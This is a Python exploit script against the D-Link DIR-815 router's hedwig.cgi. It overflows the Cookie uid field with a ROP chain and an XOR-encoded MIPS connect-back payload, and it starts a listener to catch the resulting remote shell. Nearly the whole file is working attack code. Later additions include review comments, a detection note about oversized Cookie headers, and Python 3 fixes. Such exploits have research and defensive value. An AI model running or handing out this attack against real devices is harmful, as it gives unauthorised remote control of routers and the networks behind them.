- #!/usr/bin/env python
- #Author: Zachary Cutlip
- # uid000 AT gmail dot com
- # Twitter:@zcutlip
- #Target: DIR-815 Rev A1
- #Firmware: 1.01
- #hedwig.cgi buffer overflow in HTTP header field Cookie: uid="<cookie value>"
- import sys
- from bowcaster.development import OverflowBuffer
- from bowcaster.development import SectionCreator
- from bowcaster.common.support import LittleEndian
- from bowcaster.common.support import Logging
- from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
- from bowcaster.servers.connectback_server import ConnectbackServer
- from bowcaster.encoders.mips import MipsXorEncoder
- from bowcaster.clients.http import HttpClient
# Address used on both ends of the connect-back: build_overflow() hands it to
# ConnectbackPayload, and main() binds the ConnectbackServer to it (port 8080).
# Presumably this host's address as seen from the target's network -- confirm.
CALLBACK_IP="192.168.0.10"
def build_overflow(logger=None):
    """Assemble the 2048-byte buffer that is sent in the hedwig.cgi Cookie field.

    The buffer is a set of sections at fixed offsets: four gadget addresses
    (relative to libc_base_address) placed where saved registers / the return
    address are overwritten, and an XOR-encoded connect-back payload at
    offset 1351.  Every section is filtered against badchars by the
    SectionCreator and the encoder.

    Args:
        logger: bowcaster Logging instance or None; passed through to the
            section creator, the encoder and the OverflowBuffer.

    Returns:
        An OverflowBuffer; str() of it yields the raw bytes (see send_overflow).
    """
    # Bytes that must not appear anywhere in the buffer.  The value travels
    # inside uid="<cookie value>" (see file header), so presumably a quote,
    # CR/LF or space would cut the field short and NUL ends the C string.
    badchars=["\x00","\x20","\r","\n","\""]
    # Passed as base_address to SectionCreator; the small gadget values below
    # are presumably offsets relative to this base -- verify against bowcaster.
    libc_base_address=0x2aaf8000
    # Offsets into the overflow buffer at which the saved registers are
    # overwritten.  Only reg_s0, reg_s6, reg_pc and reg_new_ra are used
    # below; the others are kept for reference and are unused.
    reg_s0=1007
    reg_s1=1011
    reg_s2=1015
    reg_s3=1019
    reg_s4=1023
    reg_s5=1027
    reg_s6=1031
    reg_s7=1035
    reg_pc=1043
    reg_new_ra=1075
    # NOTE(review): the string_section() call below uses the literal 1351
    # instead of this name; the two must stay in sync.
    stack_return=1351
    SC=SectionCreator(LittleEndian,base_address=libc_base_address,badchars=badchars,logger=logger)
    ###########################################################################
    # Stages a 2 sec arg to sleep() in $a0
    # Stages 0x20+var4($sp) in $ra; return address for sleep()
    # Jumps to $s0
    ###########################################################################
    SC.gadget_section(reg_pc,0x0004FA3C,
                      description="stage arg to sleep in $a0, stage return from sleep in $ra,jalr $s0")
    ###########################################################################
    # Address of sleep() function
    ###########################################################################
    SC.gadget_section(reg_s0,0x56bd0,description="Address of sleep()")
    ###########################################################################
    # Stackfinder. Load the following:
    # $s4=$sp+0x5d0+var_5b4
    # $s2=$sp+0x5d0+var_428
    # $s0=$sp+0x5d0+var_4c0
    # Then jalr $s6
    ###########################################################################
    SC.gadget_section(reg_new_ra,0x000255FC,
                      description="Sleep() returns here.")
    ###########################################################################
    # Jalr to $s0, which should point to the stack.
    ###########################################################################
    SC.gadget_section(reg_s6,0x000159D8,description="jalr to $s0")
    # Connect-back payload dials CALLBACK_IP; the encoder strips badchars.
    payload=ConnectbackPayload(CALLBACK_IP,LittleEndian)
    encoded_payload=MipsXorEncoder(payload,badchars=badchars,logger=logger)
    SC.string_section(1351,encoded_payload.shellcode,
                      description="XOR Encoded connect-back payload. connects back to 192.168.0.10:8080.")
    # Total buffer length is 2048 bytes; sections are laid into it at their offsets.
    buf=OverflowBuffer(LittleEndian,2048,overflow_sections=SC.section_list,logger=logger)
    return buf
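def send_overflow(buf,target_ip,logger):
    """POST to http://<target_ip>/hedwig.cgi with the overflow buffer in the Cookie header.

    The buffer is carried as `Cookie: uid=<buf>`.  A transport error from the
    send is logged and swallowed rather than raised, since the caller goes on
    to wait on the connect-back server regardless of how the HTTP exchange ends.

    Args:
        buf: OverflowBuffer from build_overflow(); str(buf) gives the raw bytes.
        target_ip: address of the device, interpolated into the URL.
        logger: bowcaster Logging instance (LOG_INFO / LOG_WARN are used).

    Returns:
        None.
    """
    # Detection note: the Cookie "uid" value here is the full 2048-byte buffer,
    # far beyond any legitimate session id for hedwig.cgi -- a length check on
    # that header is the simplest observable for this overflow.
    headers = {
        "Referer": "http://192.168.0.1/bsc_wlan.php",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Connection": "keep-alive",
        "Cookie": "uid=%s" % str(buf),
    }
    url = "http://%s/hedwig.cgi" % target_ip
    post_data = 'SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
    logger.LOG_INFO("Sending post request.")
    try:
        HttpClient().send(url, headers=headers, post_data=post_data, urlencode=True)
    except Exception as e:
        # Was `print e`, which is a SyntaxError under Python 3; report through
        # the caller's logger instead so the failure shows up with the rest of the log.
        logger.LOG_WARN("Send failed: %s" % e)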
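def find_offset(buf,find_data):
    """Return the offset at which find_data occurs in buf, as reported by buf.find_offset().

    Args:
        buf: OverflowBuffer (anything with a find_offset() method).
        find_data: either a hex address string ("0x..." / "0X..."), which is
            converted to an int before the lookup, or a literal string to search for.

    Returns:
        Whatever buf.find_offset() returns for the (possibly converted) value.
    """
    if find_data.lower().startswith("0x"):
        find_data = int(find_data, 0)
        Logging().LOG_DEBUG("Finding %#010x" % find_data)
    else:
        # The original formatted every input with %x, which raises TypeError
        # for a non-hex (string) pattern before the lookup ever ran.
        Logging().LOG_DEBUG("Finding %r" % find_data)
    return buf.find_offset(find_data)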
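def main(command):
    """Run the tool: `find=<value>` reports an offset, anything else is treated as the target IP.

    In find mode the buffer is built, the offset of <value> (a 0x-prefixed
    address or a literal string) inside it is logged, and the process exits 0.
    Otherwise the connect-back server is started on CALLBACK_IP:8080, the
    overflow is sent to the target, and the server is waited on; exit status
    is 1 if the server could not be started.

    Args:
        command: the single command-line argument.
    """
    logger = Logging()
    logger.LOG_INFO("Building overflow.")
    buf = build_overflow(logger)
    if command.startswith("find="):
        find_string = command.split("find=")[1]
        offset = find_offset(buf, find_string)
        logger.LOG_INFO("Offset of %s: %d" % (find_string, offset))
        sys.exit(0)
    logger.LOG_INFO("Starting server.")
    server = ConnectbackServer(CALLBACK_IP, port=8080, logger=logger)
    pid = server.serve()
    # Guard clause: without a listening server there is nothing to send to.
    if not pid:
        logger.LOG_WARN("Failed to start connect-back server.")
        sys.exit(1)
    try:
        send_overflow(buf, command, logger)
        server.wait()
    except Exception as e:
        # Was `print e`, a SyntaxError under Python 3.  shutdown() is only
        # called on the error path, matching the original control flow.
        logger.LOG_WARN("Error during send/wait: %s" % e)
        server.shutdown()
    logger.LOG_INFO("Done.")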
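if __name__=="__main__":
    # Exactly one argument is expected: a target IP, or find=<value> to look up
    # an offset in the generated buffer.  Without this check a missing argument
    # fails with an IndexError on sys.argv[1].
    if len(sys.argv) != 2:
        sys.stderr.write("usage: %s <target_ip> | find=<value>\n" % sys.argv[0])
        sys.exit(1)
    main(sys.argv[1])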